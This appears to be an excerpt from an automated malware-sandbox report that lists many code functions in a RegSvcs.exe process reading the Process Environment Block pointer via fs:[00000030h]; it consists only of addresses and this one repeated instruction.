Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010360B8 mov ecx, dword ptr fs:[00000030h] 8_2_010360B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0124 mov eax, dword ptr fs:[00000030h] 8_2_00FA0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h] 8_2_00F802E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h] 8_2_00F802E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802E1 mov eax, dword ptr fs:[00000030h] 8_2_00F802E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov eax, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov ecx, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov eax, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01048324 mov eax, dword ptr fs:[00000030h] 8_2_01048324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A2C3 mov eax, dword ptr fs:[00000030h] 8_2_00F7A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104634F mov eax, dword ptr fs:[00000030h] 8_2_0104634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103A352 mov eax, dword ptr fs:[00000030h] 8_2_0103A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01018350 mov ecx, dword ptr fs:[00000030h] 8_2_01018350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h] 8_2_00F802A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F802A0 mov eax, dword ptr fs:[00000030h] 8_2_00F802A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h] 8_2_00FF0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h] 8_2_00FF0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF0283 mov eax, dword ptr fs:[00000030h] 8_2_00FF0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101437C mov eax, dword ptr fs:[00000030h] 8_2_0101437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h] 8_2_00FAE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE284 mov eax, dword ptr fs:[00000030h] 8_2_00FAE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h] 8_2_00F74260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h] 8_2_00F74260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74260 mov eax, dword ptr fs:[00000030h] 8_2_00F74260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6826B mov eax, dword ptr fs:[00000030h] 8_2_00F6826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A250 mov eax, dword ptr fs:[00000030h] 8_2_00F6A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76259 mov eax, dword ptr fs:[00000030h] 8_2_00F76259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF8243 mov eax, dword ptr fs:[00000030h] 8_2_00FF8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF8243 mov ecx, dword ptr fs:[00000030h] 8_2_00FF8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6823B mov eax, dword ptr fs:[00000030h] 8_2_00F6823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102C3CD mov eax, dword ptr fs:[00000030h] 8_2_0102C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h] 8_2_010143D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010143D4 mov eax, dword ptr fs:[00000030h] 8_2_010143D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov ecx, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101E3DB mov eax, dword ptr fs:[00000030h] 8_2_0101E3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80218 mov eax, dword ptr fs:[00000030h] 8_2_00F80218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA63FF mov eax, dword ptr fs:[00000030h] 8_2_00FA63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E3F0 mov eax, dword ptr fs:[00000030h] 8_2_00F8E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F803E9 mov eax, dword ptr fs:[00000030h] 8_2_00F803E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7A3C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F783C0 mov eax, dword ptr fs:[00000030h] 8_2_00F783C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF63C0 mov eax, dword ptr fs:[00000030h] 8_2_00FF63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h] 8_2_0102A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A250 mov eax, dword ptr fs:[00000030h] 8_2_0102A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0104625D mov eax, dword ptr fs:[00000030h] 8_2_0104625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h] 8_2_00F68397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h] 8_2_00F68397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F68397 mov eax, dword ptr fs:[00000030h] 8_2_00F68397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01020274 mov eax, dword ptr fs:[00000030h] 8_2_01020274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h] 8_2_00F9438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9438F mov eax, dword ptr fs:[00000030h] 8_2_00F9438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h] 8_2_00F6E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h] 8_2_00F6E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E388 mov eax, dword ptr fs:[00000030h] 8_2_00F6E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov eax, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010062A0 mov ecx, dword ptr fs:[00000030h] 8_2_010062A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov eax, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF035C mov ecx, dword ptr fs:[00000030h] 8_2_00FF035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF2349 mov eax, dword ptr fs:[00000030h] 8_2_00FF2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010462D6 mov eax, dword ptr fs:[00000030h] 8_2_010462D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72324 mov eax, dword ptr fs:[00000030h] 8_2_00F72324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C310 mov ecx, dword ptr fs:[00000030h] 8_2_00F6C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F90310 mov ecx, dword ptr fs:[00000030h] 8_2_00F90310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA30B mov eax, dword ptr fs:[00000030h] 8_2_00FAA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01006500 mov eax, dword ptr fs:[00000030h] 8_2_01006500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01044500 mov eax, dword ptr fs:[00000030h] 8_2_01044500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F704E5 mov ecx, dword ptr fs:[00000030h] 8_2_00F704E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA44B0 mov ecx, dword ptr fs:[00000030h] 8_2_00FA44B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFA4B0 mov eax, dword ptr fs:[00000030h] 8_2_00FFA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F764AB mov eax, dword ptr fs:[00000030h] 8_2_00F764AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F76484 mov eax, dword ptr fs:[00000030h] 8_2_00F76484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9A470 mov eax, dword ptr fs:[00000030h] 8_2_00F9A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFC460 mov ecx, dword ptr fs:[00000030h] 8_2_00FFC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9245A mov eax, dword ptr fs:[00000030h] 8_2_00F9245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6645D mov eax, dword ptr fs:[00000030h] 8_2_00F6645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h] 8_2_00FAE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6C427 mov eax, dword ptr fs:[00000030h] 8_2_00F6C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h] 8_2_00F6E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h] 8_2_00FF6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h] 8_2_00FA8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F725E0 mov eax, dword ptr fs:[00000030h] 8_2_00F725E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC5ED mov eax, dword ptr fs:[00000030h] 8_2_00FAC5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h] 8_2_00F9E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F765D0 mov eax, dword ptr fs:[00000030h] 8_2_00F765D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA5D0 mov eax, dword ptr fs:[00000030h] 8_2_00FAA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE5CF mov eax, dword ptr fs:[00000030h] 8_2_00FAE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F945B1 mov eax, dword ptr fs:[00000030h] 8_2_00F945B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A456 mov eax, dword ptr fs:[00000030h] 8_2_0102A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h] 8_2_00FF05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAE59C mov eax, dword ptr fs:[00000030h] 8_2_00FAE59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA4588 mov eax, dword ptr fs:[00000030h] 8_2_00FA4588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72582 mov eax, dword ptr fs:[00000030h] 8_2_00F72582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F72582 mov ecx, dword ptr fs:[00000030h] 8_2_00F72582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A580 mov ecx, dword ptr fs:[00000030h] 8_2_00F6A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A580 mov eax, dword ptr fs:[00000030h] 8_2_00F6A580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h] 8_2_00FA656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0102A49A mov eax, dword ptr fs:[00000030h] 8_2_0102A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78550 mov eax, dword ptr fs:[00000030h] 8_2_00F78550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h] 8_2_00F9E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h] 8_2_00F80535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h] 8_2_00FEE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF06F1 mov eax, dword ptr fs:[00000030h] 8_2_00FF06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA6C7 mov ebx, dword ptr fs:[00000030h] 8_2_00FAA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA6C7 mov eax, dword ptr fs:[00000030h] 8_2_00FAA6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA66B0 mov eax, dword ptr fs:[00000030h] 8_2_00FA66B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC6A6 mov eax, dword ptr fs:[00000030h] 8_2_00FAC6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F74690 mov eax, dword ptr fs:[00000030h] 8_2_00F74690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA2674 mov eax, dword ptr fs:[00000030h] 8_2_00FA2674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0101678E mov eax, dword ptr fs:[00000030h] 8_2_0101678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAA660 mov eax, dword ptr fs:[00000030h] 8_2_00FAA660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_010247A0 mov eax, dword ptr fs:[00000030h] 8_2_010247A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8C640 mov eax, dword ptr fs:[00000030h] 8_2_00F8C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA6620 mov eax, dword ptr fs:[00000030h] 8_2_00FA6620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA8620 mov eax, dword ptr fs:[00000030h] 8_2_00FA8620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7262C mov eax, dword ptr fs:[00000030h] 8_2_00F7262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8E627 mov eax, dword ptr fs:[00000030h] 8_2_00F8E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2619 mov eax, dword ptr fs:[00000030h] 8_2_00FB2619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h] 8_2_00F8260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEE609 mov eax, dword ptr fs:[00000030h] 8_2_00FEE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F747FB mov eax, dword ptr fs:[00000030h] 8_2_00F747FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h] 8_2_00F927ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE7E1 mov eax, dword ptr fs:[00000030h] 8_2_00FFE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F7C7C0 mov eax, dword ptr fs:[00000030h] 8_2_00F7C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF07C3 mov eax, dword ptr fs:[00000030h] 8_2_00FF07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F707AF mov eax, dword ptr fs:[00000030h] 8_2_00F707AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0103866E mov eax, dword ptr fs:[00000030h] 8_2_0103866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F78770 mov eax, dword ptr fs:[00000030h] 8_2_00F78770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h] 8_2_00F80770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FFE75D mov eax, dword ptr fs:[00000030h] 8_2_00FFE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70750 mov eax, dword ptr fs:[00000030h] 8_2_00F70750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FF4755 mov eax, dword ptr fs:[00000030h] 8_2_00FF4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FB2750 mov eax, dword ptr fs:[00000030h] 8_2_00FB2750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F6A740 mov eax, dword ptr fs:[00000030h] 8_2_00F6A740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov esi, dword ptr fs:[00000030h] 8_2_00FA674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA674D mov eax, dword ptr fs:[00000030h] 8_2_00FA674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov eax, dword ptr fs:[00000030h] 8_2_00FA273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA273C mov ecx, dword ptr fs:[00000030h] 8_2_00FA273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FEC730 mov eax, dword ptr fs:[00000030h] 8_2_00FEC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC720 mov eax, dword ptr fs:[00000030h] 8_2_00FAC720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00F70710 mov eax, dword ptr fs:[00000030h] 8_2_00F70710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FA0710 mov eax, dword ptr fs:[00000030h] 8_2_00FA0710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_00FAC700 mov eax, dword ptr fs:[00000030h] 8_2_00FAC700
